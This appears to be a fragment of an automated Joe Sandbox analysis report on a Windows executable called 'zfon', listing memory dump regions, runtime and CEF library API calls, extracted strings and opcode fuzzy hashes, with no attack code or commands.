                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: iswctype
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 304682654-3887548279
                                                                                                                                                                            • Opcode ID: 90889625232b288523072e66be704fabc86384961bd469b6d4b5ec7c94db5ec1
                                                                                                                                                                            • Instruction ID: bd4f290c49f88cc7a3731686d1228f90d6d824359eeff1d197a927e6951aa51c
                                                                                                                                                                            • Opcode Fuzzy Hash: 90889625232b288523072e66be704fabc86384961bd469b6d4b5ec7c94db5ec1
                                                                                                                                                                            • Instruction Fuzzy Hash: 8051F59AE0855381FB145F72D5102BBB3A1EF28F84F889131DA4D261D5EF7DE871C611
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B36732
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B36743
                                                                                                                                                                            • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B3679C
                                                                                                                                                                            • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B3684C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: isspace$isalnumisxdigit
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 3355161242-3887548279
                                                                                                                                                                            • Opcode ID: 9ada20f4e0d4e9be004ce549e3ff6164ed490b11297bdd8de5b6a3cbde90c071
                                                                                                                                                                            • Instruction ID: f3c18e3113bc8b6980404d04d2e848b72bbea589320cac5906f772d9993c1cfd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ada20f4e0d4e9be004ce549e3ff6164ed490b11297bdd8de5b6a3cbde90c071
                                                                                                                                                                            • Instruction Fuzzy Hash: E341D6CAD0C18395FF258F31E5643FB6B919F25B94F88A031CA9817286DE1DF9278B10
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader
                                                                                                                                                                            • String ID: MOC$RCC$csm$csm
                                                                                                                                                                            • API String ID: 104395404-1441736206
                                                                                                                                                                            • Opcode ID: 4b6f8f644bd4ef04a393d3bb1b96f78be418c55213885cdd627a59364db23340
                                                                                                                                                                            • Instruction ID: 4178ba8f26d835b7237dbc20eafe4c08636c79dcc88fee5247d521de145eac9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b6f8f644bd4ef04a393d3bb1b96f78be418c55213885cdd627a59364db23340
                                                                                                                                                                            • Instruction Fuzzy Hash: A3518CBAA09642C6EB609F35D28027F27A0FF45740F667131DA4DA7681DF3CE4628F00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFD3550: cef_string_map_alloc.LIBCEF(?,?,?,?,00007FF79CFB7544), ref: 00007FF79CFD3554
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z.MSVCP140 ref: 00007FF79CFBE88A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@cef_string_map_alloc
                                                                                                                                                                            • String ID: callback_id=$ name=$[CallJsFunctionInUiThread] calling ui thread $c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 3922544612-2379361043
                                                                                                                                                                            • Opcode ID: 88080dbf10e0825f453430da8f9bb9d5dc949ec1d8c8c28ab456919ad5181f3d
                                                                                                                                                                            • Instruction ID: 0d402d543b5389b2591f09b8d55dea7c7d0a4eb2ed5e3e353864d1509ab849f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 88080dbf10e0825f453430da8f9bb9d5dc949ec1d8c8c28ab456919ad5181f3d
                                                                                                                                                                            • Instruction Fuzzy Hash: DF418233619B8781DE60EF25E4401AAB372FB84B94F959136EA8D437A9DF3CD506C740
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$ExceptionThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            • API String ID: 1847144839-1405518554
                                                                                                                                                                            • Opcode ID: 69bcb2bf6b235ff80315e2b808b356e45497ea8affdba11730961c61ec674efe
                                                                                                                                                                            • Instruction ID: 5c6ef49a0d9b2e8b70c23233c3cb6d93bb1e44a05bbfec7d7af8a1da18e08f85
                                                                                                                                                                            • Opcode Fuzzy Hash: 69bcb2bf6b235ff80315e2b808b356e45497ea8affdba11730961c61ec674efe
                                                                                                                                                                            • Instruction Fuzzy Hash: 4621C8E5E0CE4297FB609F35D9441BBA351AF44B80F48A031D69E77695DE2CE5818B40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36, xrefs: 00007FF79CFB1076
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _onexitfreememcpymemmove
                                                                                                                                                                            • String ID: SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
                                                                                                                                                                            • API String ID: 3647039986-2186856816
                                                                                                                                                                            • Opcode ID: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                                                                                            • Instruction ID: 4cd70f442cff2fffab9644b3e40471c79e877ae990faff108b447d51322238a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                                                                                            • Instruction Fuzzy Hash: 81315E19D1DB8785FB21EB39E941274A372BF58BD4F809235DD8C12266FF7CA1848320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                                                                                            • Instruction ID: b822ea0241b8982f81ec3ba75a13c831f1e53947ac7fc41816fc573ba8c845a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                                                                                            • Instruction Fuzzy Hash: 0801F2AAA1860A86FF18CF24D8411EB2361FF94748FE82034D21DA7564EF3CE127CB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBC1B42D92
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B42DA5
                                                                                                                                                                            • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBC1B42DBA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B43110
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B4315B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B480D8: memmove.VCRUNTIME140(?,?,?,?,00000000,00007FFBC1B45912), ref: 00007FFBC1B48130
                                                                                                                                                                              • Part of subcall function 00007FFBC1B480D8: memset.VCRUNTIME140(?,?,?,?,00000000,00007FFBC1B45912), ref: 00007FFBC1B4813F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemmovememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2282448879-0
                                                                                                                                                                            • Opcode ID: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                                                                                            • Instruction ID: 2f3f15468059e4a95d2d39c1ddd49cfabecf1a4e03e8a93e8b0408f5f84637f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 01E1C36AB18A8686FB018F79D4402AE2371BF48B98F54A231DE5D377A5DF3CD44AD700
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24CB
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: memcpy.VCRUNTIME140(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24E2
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24FA
                                                                                                                                                                              • Part of subcall function 00007FF79CFD6E90: cef_string_map_alloc.LIBCEF ref: 00007FF79CFD6E99
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB717E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB718E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB719E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB71AB
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB71E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$freemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 224831930-0
                                                                                                                                                                            • Opcode ID: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                                                                                            • Instruction ID: ef969ef526e86f1dc1ef0e928198cbbe4d53a5c7a218678fe783260eb7e1d379
                                                                                                                                                                            • Opcode Fuzzy Hash: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                                                                                            • Instruction Fuzzy Hash: 71917B63B04A4286EF24EB79C4643ACA3B2FB84F98F858436CA4D577A5DF38D445C320
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FF79CFC95AC
                                                                                                                                                                              • Part of subcall function 00007FF79CFB1FB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB219C), ref: 00007FF79CFB1FD5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: mallocmemcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2019052184-0
                                                                                                                                                                            • Opcode ID: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                                                                                            • Instruction ID: 51f3ec7aa93530912a74dfe7c0080c3469c39c59cc2c922977c530e0c96c89da
                                                                                                                                                                            • Opcode Fuzzy Hash: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E71C35774978381EE30AE36AA402B997B1AF46BC4F844835DE4D9B786DF3CE1918360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                                                                                            • Instruction ID: 539be1672c6864f9a72d632d05a173c4fb6ff9f00eeadadbbd82088af65f8324
                                                                                                                                                                            • Opcode Fuzzy Hash: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                                                                                            • Instruction Fuzzy Hash: 63814A73608BC29AEB61DF24E8403EEB7B1FB44748F844126EA8D17A69DF38D545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: fgetwc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2948136663-0
                                                                                                                                                                            • Opcode ID: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                                                                                            • Instruction ID: 4d06af96265599114db7ddafb869d4388b171d39052d0a10bb96163037dd5053
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D8150B7604A45CAEB50CF39C4903AD33A1FB58B98F50A132EA5E67799DF38D544C710
                                                                                                                                                                            APIs
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFB946B
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9491
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB94FF
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9532
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9560
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            Memory Dump Source
